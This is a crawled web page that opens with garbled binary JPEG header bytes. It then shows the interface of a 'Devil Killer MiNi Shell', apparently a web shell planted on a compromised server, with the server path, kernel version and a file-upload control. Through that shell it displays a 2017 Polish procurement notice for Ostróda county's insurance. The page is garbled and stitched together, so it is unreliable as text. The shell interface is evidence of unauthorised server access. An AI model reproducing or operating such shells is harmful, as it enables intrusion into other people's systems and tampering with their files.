JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170201/17862-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.powiat.ostroda.pl' target='_blank'>http://bip.powiat.ostroda.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 17862 - 2017
              z dnia 2017-02-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ostróda: Ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego oraz jednostek organizacyjnych Powiatu Ostródzkiego w latach 2017  2020<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Ostródzki z siedzibą w Ostródzie, krajowy numer identyfikacyjny
              , ul.
              ul. Jana III Sobieskiego 
              5,
              14100  
              Ostróda, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              896 429 800, e-mail
              sekretariat@powiat.ostroda.pl, faks
              896 429 817.
              <br />
              Adres strony internetowej (URL): http://bip.powiat.ostroda.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.powiat.ostroda.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.powiat.ostroda.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />Starostwo Powiatowe w Ostródzie 14-100 Ostróda, ul. Jana III Sobieskiego 5</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego oraz jednostek organizacyjnych Powiatu Ostródzkiego w latach 2017  2020<br /><b>Numer referencyjny: </b>ZP.272.AN.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.Przedmiotem zamówienia jest  ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego oraz jednostek organizacyjnych Powiatu Ostródzkiego w latach                  2017  2020, zgodnie z postanowieniami § 3 siwz, programem ubezpieczenia (zał. nr 5                     do siwz), wykazem majątku i innych danych dotyczących Zamawiającego (tabele 1-8) - stanowiącym zał. nr 6 do siwz oraz projektem umowy stanowiącym odpowiednio zał. nr 4a i 4b do siwz,  w zakresie:
1)	Część I  Ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego                     oraz jednostek organizacyjnych Powiatu Ostródzkiego, w zakresie ubezpieczeń majątkowych, jn.:
a)	Ubezpieczenia mienia od ognia i innych zdarzeń losowych,
b)	Ubezpieczenie mienia od kradzieży z włamaniem i rabunku oraz od kradzieży zwykłej,
c)	Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk,
d)	Ubezpieczenie odpowiedzialności cywilnej,
e)	Ubezpieczenie szyb od stłuczenia,
f)	Ubezpieczenie następstw nieszczęśliwych wypadków,
g)	Ubezpieczenie maszyn od uszkodzeń od wszystkich ryzyk.
2) Część II  Ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego                     oraz jednostek organizacyjnych Powiatu Ostródzkiego w zakresie ubezpieczeń komunikacyjnych jn.: 
a)	Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych
b)	Ubezpieczenie autocasco,
c)	Ubezpieczenie następstw nieszczęśliwych wypadków (NNW) kierowcy i pasażerów,
d)	Ubezpieczenie assistance.
2.	Usługi ubezpieczenia objęte przedmiotem zamówienia, o których mowa w ust. 1, dotyczą następujących jednostek:
1)	Starostwo Powiatowe w Ostródzie, 14-100 Ostróda, ul. Jana III Sobieskiego 5,                            
2)	Zarząd Dróg Powiatowych w Ostródzie, 14-100 Ostróda, ul. Grunwaldzka 62A,                 
3)	Liceum Ogólnokształcące im. Jana Bażyńskiego w Ostródzie, 14-100 Ostróda, ul. Drwęcka 2, 
4)	Zespół Szkół Licealnych w Morągu, 14-300 Morąg, ul. 11 Listopada 7, 
5)	Zespół Szkół Zawodowych im. S. Petofi w Ostródzie, 14-100 Ostróda, ul. Sportowa 1,       
6)	Zespół Szkół Zawodowych im. S. Staszica i Centrum Kształcenia Ustawicznego w Ostródzie, 14-100 Ostróda, ul. Kardynała Stefana Wyszyńskiego 2, 
7)	Zespół Szkół Rolniczych im. W. Witosa w Ostródzie, 14100 Ostróda, ul. Czarnieckiego 69,                
8)	Zespół Szkół Zawodowych i Ogólnokształcących im. 9 Drezdeńskiej Brygady Artylerii i Poradni Psychologiczno-Pedagogicznej w Morągu, 14-300 Morąg, ul. Kujawska 1, 
9)	Świetlica Terapeutyczna w Ostródzie, 14-100 Ostróda, ul. Sportowa 1, 
10)	Powiatowe Centrum Pomocy Rodzinie w Ostródzie, 14-100 Ostróda, ul. Jana III                            Sobieskiego 5, 
11)	Powiatowy Urząd Pracy w Ostródzie, 14-100 Ostróda, ul. Jana III Sobieskiego 5,    
12)	Zespół Placówek Szkolno - Wychowawczo  Rewalidacyjnych w Ostródzie, 14-100 Ostróda, ul. Grunwaldzka 14, 
13)	Specjalny Ośrodek Szkolno-Wychowawczy w Szymanowie, 14-300 Morąg, Szymanowo 2,  
14)	Zespół Placówek Pedagogicznych w Ostródzie - Poradnia Psychologiczno-Pedagogiczna,                            14-100 Ostróda, ul. Sportowa 1,  
15)	Zespół Placówek Pedagogicznych w Ostródzie - Powiatowa Biblioteka Pedagogiczna,                                14-100 Ostróda, ul. Sportowa 1,    
16)	Specjalny Ośrodek Szkolno-Wychowawczy w Miłakowie, 14-310 Miłakowo, ul. Olsztyńska 9A, 
17)	Powiatowy Inspektorat Nadzoru Budowlanego w Ostródzie, 14-100 Ostróda, ul. Jana III Sobieskiego 5, 
18)	Powiatowa Biblioteka Pedagogiczna w Ostródzie, 14-100 Ostróda, ul. Grunwaldzka 50,   
      zgodnie z programem ubezpieczenia stanowiącym zał. nr 5 do siwz; wykazem majątku                   i innych danych dotyczących Zamawiającego (tabele 1-8) - stanowiącym zał. nr 6 do siwz                                   oraz projektem umowy stanowiącym odpowiednio zał. nr 4a i 4b do siwz.

2a. Pozostałe podmioty, których dotyczą usługi ubezpieczenia objęte przedmiotem zamówienia, o których mowa w ust. 1:
1)	Dom dla Dzieci i Młodzieży Promyk w Morągu, 14-300 Morąg, ul. Żeromskiego 19,         
2)	Dom Pomocy Społecznej w Szyldaku, 14-106 Szyldak, ul. Gdańska 14,
3)	Dom dla Dzieci im. Sybiraków w Szymonowie, 14-330 Małdyty, Szymonowo 14,        
4)	Powiatowa Biblioteka Publiczna w Ostródzie, 14-100 Ostróda, ul. Drwęcka 2.               

3.	Inne postanowienia:
1)	Każdy wykonawca może złożyć ofertę na obydwie części objęte przedmiotem zamówienia         lub na wybraną część.
2)	Postępowanie prowadzone jest przy udziale brokera ubezpieczeniowego Maximus Broker Sp. z o.o. z siedzibą w Toruniu  87-100 Toruń, ul. Szosa Chełmińska 164 (dalej Broker Ubezpieczeniowy), który jako pośrednik ubezpieczeniowy działa w imieniu                    i na rzecz Zamawiającego i każdej jednostki organizacyjnej, o której mowa w ust. 2. Broker Ubezpieczeniowy pośredniczył będzie w zawarciu umowy z wybranym wykonawcą                           oraz sprawował będzie nadzór nad prawidłową jej realizacją. 
3)	Zamawiający wymaga, aby Zamawiający oraz jednostki wyszczególnione w ust. 2, nie były zobowiązane do pokrywania strat wykonawcy działającego w formie towarzystwa ubezpieczeń wzajemnych przez wnoszenie dodatkowej składki, zgodnie z art. 111 ust. 2 ustawy                              z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015r. poz. 1844 z póź. zm.). 
4)	Wykonawca zobowiązany będzie do udzielenia ochrony ubezpieczeniowej w zakresie                            i na warunkach określonych w siwz oraz w złożonej ofercie. 
5)	Zamawiający wymaga, aby za podstawę do ustalenia wysokości każdego odszkodowania Wykonawca przyjął wartości określone w specyfikacji istotnych warunków zamówienia,                  bez odnoszenia ich do wartości nowej danego środka trwałego.
6)	Wykonawca musi posiadać ogólne i szczególne warunki ubezpieczenia, zwane dalej OWU, wszystkich ubezpieczeń objętych przedmiotem zamówienia. Ogólne i szczególne warunki ubezpieczenia wykonawcy będą miały zastosowanie w sprawach nieuregulowanych postanowieniami siwz, złożoną ofertą oraz zawartą umową.
7)	Przez cały okres wykonywania zamówienia wykonawca gwarantuje niezmienność zaoferowanych warunków ubezpieczenia, na podstawie których udzielana będzie ochrona ubezpieczeniowa. Wyjątek od tej zasady dopuszczalny będzie tylko i wyłącznie w przypadku zmiany ogólnie obowiązujących przepisów, które będą miały wpływ na warunki realizacji zawartej umowy. Zmiana warunków realizacji przedmiotu zamówienia jw., wymaga aneksu do umowy.
8)	Brak zgody na włączenie do zakresu ubezpieczenia, bądź zmiana treści którejkolwiek z klauzul obligatoryjnych wymienionych w programie ubezpieczenia stanowiącym zał. nr 5 do siwz - oznaczonych w zakresie części 1 numerami od 1 do 40; w zakresie części 2 oznaczonych numerami od 1 do 4,  zostanie uznane za niezgodność treści oferty z treścią specyfikacji istotnych warunków zamówienia                 i spowoduje odrzucenie oferty na podstawie art.  89  ust. 1 pkt 2 ustawy Pzp.
<br /><br /><b>II.5) Główny kod CPV: </b>66510000-8<br /><b> Dodatkowe kody CPV:</b>66515000-3,
                66516000-0,
                66512100-3,
                66514110-0,
                66516100-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 36<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania zamówienia: 
36 miesięcy, przewidywany okres ubezpieczenia, tj. od dnia 02.03.2017r. do dnia 01.03.2020r. 

 UWAGA: w przypadku umów wieloletnich polisy wystawiane są na okresy roczne            dla wszystkich rodzajów ubezpieczeń.

Część 1:
Polisy ubezpieczeniowe w ubezpieczeniach majątkowych będą wystawiane indywidualnie dla każdej jednostki na okresy:
od 02.03.2017r. do 01.03.2018r. 
od 02.03.2018r. do 01.03.2019r. 
od 02.03.2019r. do 01.03.2020r. 

Dla ubezpieczeń wspólnych, tj. ubezpieczenie mienia od ognia i innych zdarzeń losowych                          i ubezpieczenie sprzętu elektronicznego w systemie na pierwsze ryzyko, ubezpieczenie mienia                od kradzieży z włamaniem oraz od kradzieży zwyklej, ubezpieczenie szyb od stłuczenia, ubezpieczenie odpowiedzialności cywilnej zostanie wystawiona jedna polisa (dopuszcza się wystawienie polis odrębnie na poszczególne ryzyka) obejmująca ochroną wszystkie jednostki organizacyjne Zamawiającego na okresy:
od 02.03.2017r. do 01.03.2018r. 
od 02.03.2018r. do 01.03.2019r. 
od 02.03.2019r. do 01.03.2020r. 
Każdej jednostce, o której mowa w § 3 ust. 2 siwz, zostanie wystawiony certyfikat potwierdzający udzielenie ochrony ubezpieczeniowej w zakresie wynikającym z polisy wspólnej.

UWAGA: Zamawiający zastrzega sobie prawo zmiany sposobu wystawienia polis ubezpieczeniowych po rozstrzygnięciu przetargu: dla ubezpieczeń majątkowych (indywidualnych i wspólnych) może zostać wystawiona jedna polisa obejmująca ochroną wszystkie jednostki wskazane w SIWZ.  

  Część II
Polisy dla ubezpieczeń komunikacyjnych będą wystawione na trzy okresy roczne określone indywidualnie dla każdego pojazdu i wskazane w załącznikach zawierających wykazy pojazdów. Ubezpieczenia pojazdów nabywanych w trakcie trwania umowy o udzielenie zamówienia będą zawierane na okresy roczne zgodnie z  wnioskiem Zamawiającego. 
Ostatnim dniem umożliwiającym ubezpieczenie pojazdu na warunkach umowy o udzielenie zamówienia publicznego jest ostatni dzień obowiązywania umowy, to jest 01.03.2020r.
Maksymalnie okres ubezpieczenia pojazdów zakończy się dnia  28.02.2021r.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca musi posiadać uprawnienia do prowadzenia działalności ubezpieczeniowej                    w zakresie wszystkich grup ryzyk objętych przedmiotem zamówienia, tj.:                 
 - zezwolenie Komisji Nadzoru Finansowego na prowadzenie działalności ubezpieczeniowej, zgodnie z art. 7 ust. 1 ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej                     i reasekuracyjnej (Dz. U. z 2015 r. poz. 1844 z późn. zm.) i/ lub
 - zezwolenie Ministra Finansów na wykonywanie działalności ubezpieczeniowej (jeżeli wykonawca uzyskał zezwolenie przed dniem 1 stycznia 2004r.), i/lub
 - uprawnienia do prowadzenia działalności ubezpieczeniowej (jeżeli wykonawca rozpoczął działalność ubezpieczeniową przed dniem 28.08.1990r.), i/lub
 - uprawnienia i/lub zezwolenie właściwego organu na wykonywanie działalności ubezpieczeniowej w państwie członkowskim Unii Europejskiej, w którym wykonawca                       ma siedzibę.

         
<br />
                Informacje dodatkowe
                 UWAGA: W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek udziału w postępowaniu, o którym mowa w sekcji III.1.1)  musi spełnić         każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który będzie faktycznie realizował część zamówienia wymagającą posiadania wymaganych uprawnień.<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie ustalił szczegółowych warunków dotyczących sytuacji ekonomicznej                        i finansowej wykonawcy.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie ustalił szczegółowych warunków dotyczących zdolności technicznej                 lub zawodowej.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Wykaz oświadczeń lub dokumentów składanych w postępowaniu przez wykonawcę,                           na wezwanie Zamawiającego w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy Pzp, tj. w zakresie braku podstaw wykluczenia: 
Dotyczy części 1 i 2:
1)	w trybie art. 24 ust. 1 pkt 12  22 ustawy Pzp  Zamawiający nie będzie wymagał przedkładania żadnych oświadczeń i dokumentów, z zastrzeżeniem postanowienia § 6a                   ust. 1 oraz art. 26 ust. 2f ustawy Pzp (§ 6a ust. 7 siwz);
2)	w trybie art. 24 ust. 1 pkt 23 ustawy Pzp  Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji, o której mowa w art. 86 ust. 5 ustawy Pzp (§ 11 ust. 7 siwz), przekaże Zamawiającemu oświadczenie                                o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa                w art. 24 ust. 1 pkt 23 ustawy Pzp. W przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu (wzór oświadczenia stanowi zał. nr 3 do siwz); 
3)	w trybie art. 24 ust. 5 pkt 1 ustawy Pzp - odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy  wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp, z zastrzeżeniem postanowienia art. 26 ust. 6 ustawy Pzp                        (§ 6a ust. 6 siwz).
2. Wykonawca, który polega na zdolnościach innych podmiotów na zasadach określonych                        w art. 22a ustawy Pzp, przedstawia w odniesieniu do tych podmiotów dokumenty wymienione w paragrafie 6a ust. 2 pkt 3 siwz.

3.	Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 i 3 ustawy Pzp, jeżeli Zamawiający posiada oświadczenia lub dokumenty dotyczące tego wykonawcy lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych                          w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2014r. poz. 1114 oraz z 2016r. poz. 352).

